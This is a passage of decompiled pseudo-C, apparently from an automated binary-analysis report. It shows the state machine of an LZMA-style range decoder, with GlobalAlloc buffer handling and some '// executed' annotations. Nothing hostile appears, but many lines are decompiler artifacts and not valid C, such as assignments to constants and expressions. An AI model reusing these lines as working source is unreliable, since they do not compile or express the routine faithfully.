				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
